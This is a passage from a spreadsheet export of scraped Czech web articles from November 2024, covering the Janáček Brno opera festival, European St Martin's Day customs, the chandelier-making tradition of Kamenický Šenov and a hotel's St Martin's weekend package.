Pro Janáčka netradiční kus na námět ve své době oblíbených novel básníka Svatopluka Čecha zahájí v Janáčkově divadle festival už tento pátek. „Tato opera je rozhodně nejúžasnější, nejpodivnější a nejšílenější dílo, s jakým jsem se kdy setkal, a že jsem jich už několik potkal. Byla to skutečná výzva pro náš tým,“ libuje si elitní janáčkovský režisér Carsen. Skladatel Janáček je stále mezi studenty, jeho výročí připomíná videoklip Navíc u Janáčka se jedná o neobvyklou přítomnost až sršícího humoru, který si z typicky českého človíčka, poživačného domácího Matěje Broučka z Malé Strany, který se ocitne na Měsíci a pak i ve středověké Praze , dělá pořádně nabroušenou legraci. Sám Janáček ke vzniku této opery kdysi napsal v dopise své múze Kamile Stösslové pozoruhodné vysvětlení, proč si vybral právě tento námět. „Tak víte, co to ten Brouček je? Tak zcela všední člověk; hubačí na celý svět a celý svůj život ztápí u džbánku piva . K ničemu dobrému na světě není. Ptáte se: ‚Tak proč jste si takového člověka vybral na operu?‘ Proto, aby se všem zhnusil, aby byl na posměch a aby byl výstrahou! “ píše Janáček , a byť sám velký rusofil, dodává k tomu až neuvěřitelně vizionářsky: „Rusové měli takového ‚měkkého‘ člověka též; jmenoval se Oblomov. Vlastně každý druhý Rus byl Oblomovem – a kam to přivedli! Strašná revoluce teď to potoky krve čistí. Proto Broučka vystavuji – na výstrahu. Je též u nás těch Broučků na všech stranách dost a dost! Jen žaludek je jim vším.“ Stoletá liška či Haasův Šarlatán Operní řada festivalu se věnuje Janáčkově tvorbě opravdu důkladně, a to od prvního úspěchu Její pastorkyně až po dvě vrcholná díla. „Vzácným hostem festivalu bude vynikající soubor Staatsoper Unter den Linden z Berlína , který přiveze skvělou inscenaci Věc Makropulos v režii Clause Gutha,“ hlásí Částková. Mimořádné koncerty Bamberští symfonikové s dirigentem Jakubem Hrůšou : 4. 11., Janáčkovo divadlo ( Josef Suk – Zrání, Antonín Dvořák – Koncert pro klavír a orchestr, Leoš Janáček – Taras Bulba) Orchestr Janáčkovy opery: 15. 11., Mahenovo divadlo ( Leoš Janáček – Houslový koncert „Putování dušičky“, Miloslav Ištvan – Zaklínání času pro dva vypravěče a orchestr, Bohuslav Martinů – Kytice) Staatskapelle Berlín: 17. 11., Janáčkovo divadlo (Samy Moussa – Elysium, Felix Mendelssohn Bartholdy – Koncert pro klavír a orchestr, Arnold Schönberg – Pelleas a Melisande) A druhý kus? „Zdá se to neuvěřitelné, ale opera Příhody lišky Bystroušky oslaví 6. listopadu sté výročí premiéry,“ přidává dramaturgyně a dodává, že svá blahopřání si připravily hned dva soubory. „Za Janáčkovo rodiště to bude zbrusu nová inscenace Moravskoslezského divadla v režii izraelského choreografa Itzika Galiliho a z domovských bílovických lesů inscenace Janáčkovy opery s mimořádnými hosty Kateřinou Kněžíkovou coby Bystrouškou a Adamem Plachetkou jako Revírníkem,“ vyzdvihuje. Čtyřiadvacítka festivalových dnů toho však nabízí mnohem víc. „Vedle pochopitelného důrazu na Janáčkovu tvorbu přinese na koncertech symfonických, komorních i recitálech nejen díla českých skladatelů, jejichž životní data končí až mytickou čtyřkou – Bedřich Smetana , Antonín Dvořák , Leoš Janáček , Josef Suk , ale představí i další autory, kteří formulovali, či naopak záměrně rozostřili pojem české hudby,“ říká muzikolog Jiří Zahrádka. Důraz se klade také na díla židovských autorů, jejichž životy i tvorba byly násilně ukončeny nacistickým běsněním. „Zazní tak především řada děl Janáčkova oblíbeného a nadaného žáka Pavla Haase ,“ zmiňuje brněnského rodáka, jehož v roce 1944 zavraždili v Osvětimi . „V brněnském Mahenově divadle měla v roce 1938 světovou premiéru Haasova jediná opera Šarlatán a tam se také po téměř devadesáti letech vrátí v nové inscenaci souboru opery Národního divadla moravskoslezského v režii Ondřeje Havelky a pod taktovkou Marka Šedivého,“ doplňuje dramaturgyně Částková. Světová tělesa, vily i recepty K obrovským tahákům patří také koncerty Bamberských symfoniků s brněnským dirigentem Jakubem Hrůšou , Staatskapelle Berlín s dirigentem Christianem Thielemannem , ale také hudba v podání nejlepších domácích i zahraničních komorních těles. K velkým bonusům lze podle Zahrádky připočítat rovněž tradiční, ale i neotřelé prostory pro konání koncertů, jako je refektář augustiniánského opatství nebo ikonické brněnské vily Tugendhat , Stiassni či Löw-Beer. Doprovodné výstavy Sté výročí opery Příhody lišky Bystroušky: Výstavu ve vstupní hale Dietrichsteinského paláce tvoří velkoformátové reprodukce dobových dokumentů včetně fotografií z představení a kostýmních návrhů malíře Eduarda Miléna . Věc Janáček : Expozice v Památníku Leoše Janáčka ve Smetanově ulici ukáže, jak Janáčka viděli a zobrazovali výtvarní umělci, ať už skladatelovi současníci, nebo zástupci pozdějších generací. Všechny akce na janacek-brno.cz, ale také na webech Moravského zemského muzea a TIC Brno. „Za koncerty s českou jazzovou hudbou období první republiky můžou návštěvníci festivalu zavítat do brněnských prvorepublikových kaváren,“ dodává Zahrádka. Navíc se po dobu konání festivalu bude ve třinácti brněnských restauracích, kavárnách či cukrárnách podávat jídlo a dezerty podle receptů Janáčkovy hospodyně Marie Stejskalové. Brněnským TIC byla rovněž připravena janáčkovská trasa po městě, kterou lze s mobilní aplikací Loxper celou projít a s heslem získaným na jejím konci obdržet v informačním centru pod krokodýlem odměnu. Ve vile Löw-Beer bude též přístupná výstava originálů ilustrací k Těsnohlídkově knižní předloze Lišky Bystroušky od Venduly Chalánkové . A její kolážový doprovod ke knihám Janáčkovy hospodyně Mářiny paměti a Mářina kuchařka zájemci najdou během otvíracích hodin v kavárně Era od 6. listopadu až do 6. ledna. Lze si též projet či projít místa spojená s Janáčkovým životem v Brně a Hukvaldech , případně po naskenování QR kódů u siluety Janáčka s jeho fenkou Čiperou v ulicích poslouchat z mobilu jeho hudbu. Autor: Jana Soukupová Autor Jana Soukupová Rubrika transition_slide Metro - Jihomoravský kraj</t>
  </si>
  <si>
    <t>20241101_446_3241641216_3d338413abf5aba814ca.html</t>
  </si>
  <si>
    <t>3d338413abf5aba814ca</t>
  </si>
  <si>
    <t>Svátek svatého Martina je evropským díkůvzdáním: V některých zemích se koleduje, v Holandsku volí speciální Miss</t>
  </si>
  <si>
    <t>Svátek svatého Martina je evropským díkůvzdáním: V některých zemích se koleduje, v Holandsku volí speciální Miss Svátek svatého Martina se slaví od dob ranného křesťanství a někdy je označovaný také jako „evropské díkůvzdání“. Jednou z tradicí v mnoha zemích společnou je svatomartinská husa, někde jsou oslavy spojené s mladým vínem , jinde hlavně s lampionovými průvody. Jana Soukupová | 1. 11. 2024 Tradice pocházející z Francie se postupně rozšířila se do Velké Británie , Skandinávie , Německa a dalších zemí Evropy . Je poctou životu římského vojáka , později mnicha a nakonec biskupa Martina z Tours , který zemřel 8. listopadu 397. Svátek připadá na datum jeho pohřbu a nanebevzetí dne 11. listopadu . Martin se proslavil svojí soucitností a dobrými skutky . Byl uctívaným ochráncem chudých, dětí a lidí bez domova. Uváděný je také jako patron všech vojáků, jezdců, koní i podkovářů , mlynářů, cestovatelů, hus a vinařů. Datum svatomartinských oslav se zároveň shoduje s obdobím posledních okamžiků zemědělské sklizně. Jedenáctý listopad je také důležitým dnem moderní historie, kdy příměří podepsané v roce 1918 ukončilo boje první světové války . Mohlo by se vám líbit Recept na propečenou svatomartinskou husu na jablkách Levandulí provoněná, tradicí a legendami propletená svatomartinská husa, která by na vaší sváteční tabuli rozhodně neměla chybět. Připravte si dobrou náladu, nastartujte chuťové pohárky a pusťte se s námi do přípravy dokonalé svatomartinské pochoutky. marianne.cz Hospodářova hostina a předpovědi z husích kostí Kolem svátku svatého Martina podzim pomalu střídal zimu a začínalo sněžit. Touto dobou končil hospodářský rok , statkáři připravovali pro své lidi pohoštění jako poděkování a také jim vypláceli mzdu. V českých zemích se na svatého Martina používala sváteční husa i k předpovídání počasí. Lidé se po jídle soustředili na její prsní kosti: pokud byly bílé, očekávala se tuhá zima , zatímco tmavé znamenaly zimu deštivou a blátivou a nafialovělé značily mírné počasí. Dnes je v Česku svátek svatého Martina především oslavou dobrého jídla a pití . Ve vinných sklípcích se žehná vínu a po republice se pořádá mnoho akcí, spojených i s ochutnávkami. Tradičně se 11. listopadu pečou husy a přesně v 11:11 otevírají první lahve mladého vína . Svatý Martin ve Francii ustoupil výročí konce války I když světcova historie tak úzce souvisí s francouzským územím , je tu vzpomínka na svatého Martina spíše lokální a církevní záležitostí. Jedinou výjimkou je region Alsasko , kde děti navštěvující francouzsko-německé školy. Chodí v den „Fête de la Saint-Martin“ se svými ručními svítilnami do průvodů ulicemi města , podobně jako jejich němečtí sousedé. Francie má sice 11. listopadu státní svátek, ten je ale oslavou podepsání příměří ve vlakovém voze u severofrancouzského města Compiègne v roce 1918. Na západní frontě tak skončily boje 1. světové války. Německo i Rakousko zdobí lampionové průvody V německých ulicích můžeme ve dnech kolem 11. listopadu potkat Laternenumzug (lampiponový průvod) a slyšet děti zpívat „ Laterne Laterne , Sonne, Mond und Sterne“ (lucerny, lucerny, slunce, měsíc a hvězdy). Svátek svatého Martina tu děti milují. Účastní se průvodů barevných papírových lampionů, při nichž se zpívají písně věnované světci. Některé průvody mají v čele muže na koni , oblečeného v uniformě středověkého vojáka. I v Německu se na svatého Martina jí husa , například plněná jablky nebo glazovanými kaštany s medem a rozinkami. V některých oblastech chodí děti na koledu. Lampionové průvody jsou svatomartinskou tradicí i v Rakousku . V Burgenlandu , jehož je svatý Martin patronem, je 11. listopadu státní svátek, zatímco ostatní spolkové země mají běžný den. Dříve se v Rakousku na svatého Martina koledovalo, dnes tato tradice přetrvala jen v Burgenlandu a v Pinzgau . Vinařské oblasti v tento křtí a koštují mladé víno . Itálie slaví velkolepě a rozmanitě Svatý Martin se velkolepě slaví po celé Itálii , v mnoha městech také prostřednictvím festivalů a oblíbených veletrhů. Zvláštní je atmosféra v Benátkách : děti tam chodí po ulicích města, hlučně bouchají hrnci a pánvemi a s pomocí říkanek koledují za bonbóny nebo peníze. V benátských domech nesmí chybět sladké pečivo ve tvaru světce na koni, pokryté barevnou polevou a čokoládou. Dospělí tento den slaví otevřením sudů pro první ochutnání nového vína , tradicí jsou také pečené kaštany. V některých oblastech se pořádají lampionové průvody, martinské dostihy nebo střelecké slavnosti . V Holandsku volí Miss chovatelku hus V Holandsku je důležitou součástí oslav hořící oheň . Na mnohých místech se také udržuje tradice martinských koled s lampiony. V dřívějších dobách chodily koledovat děti s pochodněmi nebo svítilnami vydlabanými z velké krmné řepy . Existuje totiž legenda, že kůň svatému Martinovi jednou večer utekl a ochotní vesničané se jej vydali hledat s loučemi a lucernami. Pozůstatkem starých lidových oslav jsou také "ganzenmarkten" – dříve husí trhy, dnes folklórní událost v každé druhé listopadové pondělí. Slavný Husí trh ve městě Coevorden je ve skutečnosti jedním velkým festivalem, kde se mimo jiné volí také Miss chovatelka hus . Město Uttrecht, jehož je svatý Martin patronem, pořádá okázalé svatomartinské slavnosti. Mohlo by se vám líbit Makové svatomartinské rohlíčky symbol pohostinosti Svatomartinské rohlíčky jsou sladkou tradicí. Křehké makové rohlíčky, pečené při příležitosti svátku svatého Martina , nás propojují s dávnými časy, kdy se lidé o pohostinnost dělili s potřebnými. Objevte historii i recept na tuto lahůdku, která nejen voní, ale i symbolizuje lidskost a teplo domova. marianne.cz Zdroj článku autorský článek, hotelsclick.com Marianne je i na sociálních sítích: listopad svátek tradice oslava zvyky Související články Tradice Svatý Šimon a Juda: Pranostiky, které ohlašují první mrazíky na Den české státnosti Tradice Barevné dýně ve stylu mexického svátku mrtvých: Dekorace, kterou musíte letos zkusit Tradice Proč slavíme Dušičky v listopadu a čemu věřili naši předkové Tradice Kvíz: Historické náčiní jako pomocníci v každodenním životě. Uhodnete, k čemu sloužilo? Autor: Jana Soukupová Autor person Jana Soukupová</t>
  </si>
  <si>
    <t>113050</t>
  </si>
  <si>
    <t>109680</t>
  </si>
  <si>
    <t>20241101_447_3241636719_3c9edcab8bffe7e3edf2.html</t>
  </si>
  <si>
    <t>3c9edcab8bffe7e3edf2</t>
  </si>
  <si>
    <t>Nadupaný Janáček jede bez hranic, představí i „nejšílenější operu“ Jen tři festivaly v České republice stojí ministerstvu kultury za speciální podporu. Ten filmový v Karlových Varech , stálice Pražské jaro a nově také festival Janáček Brno. Ten se v letošním Roku české hudby a při četných janáčkovských výročích, včetně 170 let od narození věhlasného skladatele, koná od tohoto pátku do 24. listopadu na mnoha místech Brna se skutečně bohatým programem. Prestižní operní festival Janáček Brno láká do jihomoravské metropole na třítýdenní multižánrovou nabídku. „Tento operní festival se za dobu své existence vyprofiloval v jedinečnou akci s velkým mezinárodním ohlasem. Právě díky téhle reputaci navázal umělecké spolupráce, které v podmínkách České republiky nemají obdoby,“ zdůvodnil téměř přesně před rokem přímo v Brně příspěvek patnáct milionů korun ministr kultury Martin Baxa ( ODS ). Výběr z programu Leoš Janáček – Výlety páně Broučkovy: slavnostní zahájení festivalu 1. 11., Janáčkovo divadlo Pavel Haas – Šarlatán: 8. 11., Mahenovo divadlo Leoš Janáček – Příhody lišky Bystroušky: 10. 11., Mahenovo divadlo Leoš Janáček – Věc Makropulos: 16. 11., Janáčkovo divadlo Antonín Dvořák – Rusalka: 23. 11., Janáčkovo divadlo Leoš Janáček – Příhody lišky Bystroušky: slavnostní zakončení festivalu 24. 11., Janáčkovo divadlo „Festivalový program se v ročníku 2024 dotkne hvězdných výšin. Pomyslnou laťku kvality se během krátké doby podařilo zvednout na úroveň, která splňuje parametry prvořadé evropské kulturní události,“ dodává k tomu za pořádající Národní divadlo Brno (NdB) jeho ředitel Martin Glaser. A široká nabídka pod heslem Bez hranic! skutečně dokazuje, že přímou dotaci od státu se podařilo zhodnotit. „Jako lidé si hranic stavíme nespočetně, ale cesta do říše fantazie je otevřena všem a hudba, ta žádné hranice nezná,“ zdůvodňuje motto letošního ročníku dramaturgyně Janáčkovy opery Patricie Částková. Umělecký šéf Jiří Heřman přidává, že už když člověk prvně vstoupil na Měsíc, hrála k tomu Novosvětská českého hudebního skladatele Antonína Dvořáka . „S radostí nyní otevíráme interpretační hranice a těšíme se na zážitky z různorodých pohledů na díla našich skladatelů,“ zve Heřman na program letošního ročníku. Speciálně na to, co s operou Leoše Janáčka Výlety páně Broučkovy provedl kanadský režisér Robert Carsen a skotský tenorista Nicky Spence v titulní roli. Nejúžasnější a nejšílenější opera Pro Janáčka netradiční kus na námět ve své době oblíbených novel básníka Svatopluka Čecha zahájí v Janáčkově divadle festival už tento pátek. „Tato opera je rozhodně nejúžasnější, nejpodivnější a nejšílenější dílo, s jakým jsem se kdy setkal, a že jsem jich už několik potkal. Byla to skutečná výzva pro náš tým,“ libuje si elitní janáčkovský režisér Carsen. Skladatel Janáček je stále mezi studenty, jeho výročí připomíná videoklip Navíc u Janáčka se jedná o neobvyklou přítomnost až sršícího humoru, který si z typicky českého človíčka, poživačného domácího Matěje Broučka z Malé Strany, který se ocitne na Měsíci a pak i ve středověké Praze , dělá pořádně nabroušenou legraci. Sám Janáček ke vzniku této opery kdysi napsal v dopise své múze Kamile Stösslové pozoruhodné vysvětlení, proč si vybral právě tento námět. „Tak víte, co to ten Brouček je? Tak zcela všední člověk; hubačí na celý svět a celý svůj život ztápí u džbánku piva . K ničemu dobrému na světě není. Ptáte se: ‚Tak proč jste si takového člověka vybral na operu?‘ Proto, aby se všem zhnusil, aby byl na posměch a aby byl výstrahou! “ píše Janáček , a byť sám velký rusofil, dodává k tomu až neuvěřitelně vizionářsky: „Rusové měli takového ‚měkkého‘ člověka též; jmenoval se Oblomov. Vlastně každý druhý Rus byl Oblomovem – a kam to přivedli! Strašná revoluce teď to potoky krve čistí. Proto Broučka vystavuji – na výstrahu. Je též u nás těch Broučků na všech stranách dost a dost! Jen žaludek je jim vším.“ Stoletá liška či Haasův Šarlatán Operní řada festivalu se věnuje Janáčkově tvorbě opravdu důkladně, a to od prvního úspěchu Její pastorkyně až po dvě vrcholná díla. „Vzácným hostem festivalu bude vynikající soubor Staatsoper Unter den Linden z Berlína , který přiveze skvělou inscenaci Věc Makropulos v režii Clause Gutha,“ hlásí Částková. Mimořádné koncerty Bamberští symfonikové s dirigentem Jakubem Hrůšou : 4. 11., Janáčkovo divadlo ( Josef Suk – Zrání, Antonín Dvořák – Koncert pro klavír a orchestr, Leoš Janáček – Taras Bulba) Orchestr Janáčkovy opery: 15. 11., Mahenovo divadlo ( Leoš Janáček – Houslový koncert „Putování dušičky“, Miloslav Ištvan – Zaklínání času pro dva vypravěče a orchestr, Bohuslav Martinů – Kytice) Staatskapelle Berlín: 17. 11., Janáčkovo divadlo (Samy Moussa – Elysium, Felix Mendelssohn Bartholdy – Koncert pro klavír a orchestr, Arnold Schönberg – Pelleas a Melisande) A druhý kus? „Zdá se to neuvěřitelné, ale opera Příhody lišky Bystroušky oslaví 6. listopadu sté výročí premiéry,“ přidává dramaturgyně a dodává, že svá blahopřání si připravily hned dva soubory. „Za Janáčkovo rodiště to bude zbrusu nová inscenace Moravskoslezského divadla v režii izraelského choreografa Itzika Galiliho a z domovských bílovických lesů inscenace Janáčkovy opery s mimořádnými hosty Kateřinou Kněžíkovou coby Bystrouškou a Adamem Plachetkou jako Revírníkem,“ vyzdvihuje. Čtyřiadvacítka festivalových dnů toho však nabízí mnohem víc. „Vedle pochopitelného důrazu na Janáčkovu tvorbu přinese na koncertech symfonických, komorních i recitálech nejen díla českých skladatelů, jejichž životní data končí až mytickou čtyřkou – Bedřich Smetana , Antonín Dvořák , Leoš Janáček , Josef Suk , ale představí i další autory, kteří formulovali, či naopak záměrně rozostřili pojem české hudby,“ říká muzikolog Jiří Zahrádka. Důraz se klade také na díla židovských autorů, jejichž životy i tvorba byly násilně ukončeny nacistickým běsněním. „Zazní tak především řada děl Janáčkova oblíbeného a nadaného žáka Pavla Haase ,“ zmiňuje brněnského rodáka, jehož v roce 1944 zavraždili v Osvětimi . „V brněnském Mahenově divadle měla v roce 1938 světovou premiéru Haasova jediná opera Šarlatán a tam se také po téměř devadesáti letech vrátí v nové inscenaci souboru opery Národního divadla moravskoslezského v režii Ondřeje Havelky a pod taktovkou Marka Šedivého,“ doplňuje dramaturgyně Částková. Světová tělesa, vily i recepty K obrovským tahákům patří také koncerty Bamberských symfoniků s brněnským dirigentem Jakubem Hrůšou , Staatskapelle Berlín s dirigentem Christianem Thielemannem , ale také hudba v podání nejlepších domácích i zahraničních komorních těles. K velkým bonusům lze podle Zahrádky připočítat rovněž tradiční, ale i neotřelé prostory pro konání koncertů, jako je refektář augustiniánského opatství nebo ikonické brněnské vily Tugendhat , Stiassni či Löw-Beer. Doprovodné výstavy Sté výročí opery Příhody lišky Bystroušky: Výstavu ve vstupní hale Dietrichsteinského paláce tvoří velkoformátové reprodukce dobových dokumentů včetně fotografií z představení a kostýmních návrhů malíře Eduarda Miléna . Věc Janáček : Expozice v Památníku Leoše Janáčka ve Smetanově ulici ukáže, jak Janáčka viděli a zobrazovali výtvarní umělci, ať už skladatelovi současníci, nebo zástupci pozdějších generací. Všechny akce na janacek-brno.cz, ale také na webech Moravského zemského muzea a TIC Brno. „Za koncerty s českou jazzovou hudbou období první republiky můžou návštěvníci festivalu zavítat do brněnských prvorepublikových kaváren,“ dodává Zahrádka. Navíc se po dobu konání festivalu bude ve třinácti brněnských restauracích, kavárnách či cukrárnách podávat jídlo a dezerty podle receptů Janáčkovy hospodyně Marie Stejskalové. Brněnským TIC byla rovněž připravena janáčkovská trasa po městě, kterou lze s mobilní aplikací Loxper celou projít a s heslem získaným na jejím konci obdržet v informačním centru pod krokodýlem odměnu. Ve vile Löw-Beer bude též přístupná výstava originálů ilustrací k Těsnohlídkově knižní předloze Lišky Bystroušky od Venduly Chalánkové . A její kolážový doprovod ke knihám Janáčkovy hospodyně Mářiny paměti a Mářina kuchařka zájemci najdou během otvíracích hodin v kavárně Era od 6. listopadu až do 6. ledna. Lze si též projet či projít místa spojená s Janáčkovým životem v Brně a Hukvaldech , případně po naskenování QR kódů u siluety Janáčka s jeho fenkou Čiperou v ulicích poslouchat z mobilu jeho hudbu. Autor: Jana Soukupová Autor person Jana Soukupová Rubrika transition_slide Rádio Impuls - Jihomoravský kraj</t>
  </si>
  <si>
    <t>20241101_448_3241636727_6c9f3f3bf02fb146288d.html</t>
  </si>
  <si>
    <t>6c9f3f3bf02fb146288d</t>
  </si>
  <si>
    <t>Křišťálové lustry září v&amp;nbsp;Kamenickém Šenově už tři sta let. Jak dnes vypadají?</t>
  </si>
  <si>
    <t>Křišťálové lustry září v&amp;nbsp;Kamenickém Šenově už tři sta let. Jak dnes vypadají? Lustr značky Preciosa z Kamenického Šenova zdobí i hotel Ritz-Carlton v jordánském Ammánu . Milánskou La Scalu , římské Teatro dell’Opera i newyorský hotel Waldorf Astoria spojuje jedna věc: křišťálový lustr z Kamenického Šenova . Slavná sklárna Elias Palme sice zanikla, ale v 300 let staré tradici pokračují nové značky. Článek si také můžete poslechnout v audioverzi. Jméno Elias Palme . Právě ono zásadním způsobem přispělo ke známosti Kamenického Šenova , malého města v severních Čechách , po celém světě. Lustry nejvyšší kvality, které se zde vyráběly, se dostávaly do předních operních domů, soukromých paláců, hotelů, nebo třeba kostelů. Byly vyhlášené svým designem i absolutní kvalitou. „Dělat jen tolik, aby se vše dalo udělat přesně a osobně prohlédnout a zkontrolovat,“ bylo od počátku mottem firmy Elias Palme &amp;amp; Co., která se nebála velkých výzev. Třeba zmíněný lustr v Teatro dell’Opera má průměr šest metrů a výšku 3,5 metru, váží tři tuny a zdobí ho 27 tisíc hranolových skleněných krystalů. V roce 1928, kdy byl instalován, platil za největší lustr v Evropě . Magazín Seznam Zpráv Cestování | Jídlo | Životní styl | Architektura | Historie Vetřelci v české krajině: 10 invazních druhů, jež ohrožují přírodu i zdraví Křišťálové lustry září v Kamenickém Šenově už tři sta let. Jak dnes vypadají? Váš nový přítel chlad: Zlepšuje zdraví i náladu. Pozvete ho domů? Roadtrip po Namibii . Dobrodružství, které musíte zažít Za husou i vínem . 10 tipů, kde si pochutnat na svatomartinských hodech Historie lustrů je ale v Kamenickém Šenově ještě starší. Svítidla se v okolí podomácku vyráběla už koncem 17. století. První větší dílnu ale založil Josef Palme v necelé dva kilometry vzdálené Práchni v roce 1724 – díky tomu letos oslavilo zdejší lustrařství 300 let. Je jen třeba podotknout, že první známá zmínka o výrobě křišťálového lustru v Česku je už z roku 1677 ze sklárny v Borové , kterou ovšem vedli Francouzi. Dílna Josefa Palmeho nebyla velkou továrnou, jak bychom si ji představovali dnes, přesto se mu podařilo udělat z českých lustrů pojem. Ty jeho zdobily třeba zámek Hof v Dolním Rakousku . Na absolutní špičku pak výrobu dostal Elias Palme . Ačkoliv jeho jméno svádí k představě, že jde o Josefova potomka, překvapivě nešlo o rodinnou tradici, ale o shodu příjmení. Ale možná i tahle shoda vedla Eliase k víře, že má šanci dostat se mezi nejlepší. V roce 1849 zaregistroval svou vlastní firmu a postupně se začal prosazovat i ve světě. Smutný osud Eliášky Společnost Elias Palme &amp;amp; Co. se začala specializovat na přepychové lustry s ověsky a také na věrné kopie historických svítidel, jako byla například ta ve Versailles . Historie firmy se však uzavřela v roce 1946, kdy byly jednotlivé lustrařské podniky sjednoceny pod „Společnou národní správu podniků pro výrobu skleněných lustrů v obvodech Bor a Kamenický Šenov se sídlem v Kamenickém Šenově “. Výroba lustrů v závodě Elias Palme v Kamenickém Šenově v roce 1948. V roce 1966 pak byla většina výroby přesunuta do nové budovy národního podniku Lustry (dnešní Preciosy ) ve spodní části města. A v roce 1972 zde skončila definitivně. Původní továrna nazývaná Eliáška pak ještě krátce sloužila jako sklad, ale od té doby zůstala nevyužitá. Poslední majitel Harry Palme , Eliasův vnuk, byl vyjmut z povinného vyhnání německého obyvatelstva. Nejprve zaučoval nově příchozí české zaměstnance a později v ústraní psal odborná díla o historii Kamenického Šenova a tamním sklářství. Z rodinné vily se musel vystěhovat do malého domku v Práchni , v důchodu ale požádal o možnost z republiky odejít. Toho se však nedočkal, zemřel 5. června 1955, pouhý den před povoleným vystěhováním za svou rodinou do západního Německa . Smutný byl i osud samotné secesní továrny Eliáška. Je sice zapsána na seznam kulturních památek, roky však neutěšeně chátrá. Navzdory tomu, že o ní studentka Tereza Šváchová sepsala diplomovou práci, v níž navrhla novou možnost využití, i tomu, že o ní v roce 2019 pražské Uměleckoprůmyslové muzeum uspořádalo výstavu 170 let sklárny Elias Palme . Lustry pro luxusní jachty a nové technologie Výroba lustrů v okolí Kamenického Šenova si ovšem udržela vysokou kvalitu po celou dobu a křišťálové lustry odsud i za minulého režimu mířily do předních světových sálů. Po roce 1989 se stala nejúspěšnější zdejší značkou zmíněná Preciosa Lighting, která vznikla právě z národního podniku Lustry. Svítidla, která dnes dodává do luxusních hotelových řetězců, soukromých rezidencí, paláců, jachet nebo obchodních domů po celém světě, vycházejí ze tři sta let staré tradice. Společnost přitom pracuje převážně na výrobě svítidel přímo na míru, zákazníky jsou převážně designová studia, architekti či developeři. Lustry z Kamenického Šenova tak vedle slavných budov zmiňovaných v úvodu visí například také v hotelu One&amp;amp;Only One Za'abeel v Dubaji , v obchodním centru Reem Mall v Abu Dhabí , v Kigali Convention Centre ve Rwandě nebo ve vinařském hotelu Chateau Elan v americké Georgii . Moderní lustry z Kamenického Šenova ve světě: Kigali Convention Centre, Rwanda Vinařský hotel Chateau Elan, USA Hotel One&amp;amp;Only One Za'abeel, Dubaj Obchodní centrum Reem Mall, Abú Dhabí Designéři společnosti pracují na návrzích exkluzivních svítidel v moderních designech, zároveň ale navazují i na odkaz minulosti. „I když se design svítidel neustále vyvíjí a přizpůsobuje novým technologiím a estetickým trendům, přesto se inspirujeme a čerpáme z tvarů, kompozic a z návrhů, pro nás teď už klasických, křišťálových svítidel z minulých staletí,“ popisuje Petra Mejzlíková, marketingová ředitelka značky. Firma staví na ručním řemesle. „Základní principy techniky foukání a tvarování skla jsou po staletí stejné a mimo jiných materiálů používáme stále i dřevěné formy na tvarování skla. Vyvíjí se však nástroje, technologie a chemické složení skla,“ říká Mejzlíková. Zároveň vysvětluje, jak se design lustrů ve srovnání s minulostí proměnil. Jak naznačuje, od světla očekáváme, že rozsvítí prostor, ale zároveň může přinést i něco navíc – emoce a neopakovatelnou atmosféru. I v době moderních technologií to stále splňují i křišťálové lustry, proto zájem o ně neklesá. „Jsou nadčasové, elegantní a v kombinaci s moderními prvky vytváří zajímavé kontrasty,“ zdůvodňuje Petra Mejzlíková. Důležitou roli však v dnešní výrobě lustrů hrají i nové technologie, jako jsou umělá inteligence, LED či herní software. „Kombinací moderních technologií vznikají neuvěřitelně imerzivní instalace, které spojují inovativní design, inteligentní ovládání a dynamické světelné efekty pro jedinečný zážitek v každém prostoru,“ popisuje Mejzlíková. Vydejte se objevovat historii skla Preciosa Lighting přitom není jediná firma, která v Kamenickém Šenově a jeho nejbližším okolí tradici výroby lustrů a potažmo skla udržuje. Na výrobu lustrů se zaměřuje i sklárna Jílek, kterou založili bratři Jílkovi v roce 1905. Tradici výroby lustrů v Kamenickém Šenově pomáhá udržovat i Střední uměleckoprůmyslová škola sklářská, nejstarší sklářská škola na světě. Založená byla už v roce 1856, tedy před téměř 170 lety. I ta byla po roce 1948 zapojena do státního podniku Borské sklo. Po roce 1989 rodiny původních majitelů bývalou Jílkovu sklárnu odkoupily od Fondu národního majetku . Dnes má nové majitele, kteří se však snaží opět o její rozvoj. Značka vyrábí lustry na zakázku, případně nabízí repase historických svítidel. To, že historie skla je v Kamenickém Šenově všudypřítomná, pak dokazuje další ze značek, Galerie Prousek. Vznikla sice až v roce 1989, svou výrobu má však v sousedním Novém Oldřichově v továrně, v níž své lustry kdysi vyráběl jistý Theodor Palme – další sklář tohoto věhlasného německého příjmení. Firma budovu koupila v roce 2011 v havarijním stavu a zachránila. Lustry a kultura v Kamenickém Šenově Práce zmíněných výrobců lustrů si můžete každé léto v Kamenickém Šenově prohlédnout na akci Lustrfest, která vždy přichystá oslnivé zážitky. Letos zde byla k vidění například instalace Crystal Beat 2 od Preciosy Lighting, která byla předtím vystavena na milánském Design Weeku . Návštěvu ve městě si ale užijete kdykoli během roku. Sklářské muzeum představuje řadu exponátů rytého a broušeného skla a věnuje se také historii lustrů. Výjimečným zdejším exponátem je skleněná židle vyrobená firmou Eliase Palmeho pro palác mahárádži v Hajdarábádu v Indii . Kalendář dalších akcí, které se v Kamenickém Šenově konají, naleznete i na regionálním webu Crystal Valley.</t>
  </si>
  <si>
    <t>20241101_449_3241626919_1f5c848ebca17ad2b041.html</t>
  </si>
  <si>
    <t>1f5c848ebca17ad2b041</t>
  </si>
  <si>
    <t>Svatomartinský víkend v hotelu Slunce</t>
  </si>
  <si>
    <t>Svatomartinský víkend v hotelu Slunce Na Slunce můžete vyrazit na Svatomartinský víkend. Letos se zde rozhodli oslavit svátek svatého Martina pro náš kraj tradičním způsobem – svatomartinskou husu zapijeme našim oroseným Morousem, který je po husí pečínce se zelím a variací knedlíků nejlepší. Samozřejmě nebude chybět ani oblíbený husí kaldoun s celestýnskými nudlemi a játrovými knedlíčky, jablkový koláč a další speciality, ale svatomartinského vína se letos na Slunci nedočkáte. Cena zahrnuje: 2 x ubytování ve dvoulůžkovém pokoji nebo v rodinném apartmánu 2 x snídaně formou studeného a teplého rautu 1 x večeře formou dvouchodového menu 1 x večeře – čtyřchodového menu "Svatomartinské speciality" neomezený vstup do našeho Aquacentra Slunce Wi-Fi v celém areálu zdarma parkování zdarma prodloužený nedělní čas odjezdu (check-out) do 14:00 hod. Počasí: dnes 9 °C Rychlost větru: 1 m/s Oblačnost: 15 % Tlak: 1029 hPa Vlhkost: 43 % Rychlost větru: 1 m/s Tlak: 1027 hPa Vlhkost: 50 % Rychlost větru: 2 m/s Tlak: 1028 hPa Vlhkost: 59 % Rychlost větru: 2 m/s Oblačnost: 100 % Tlak: 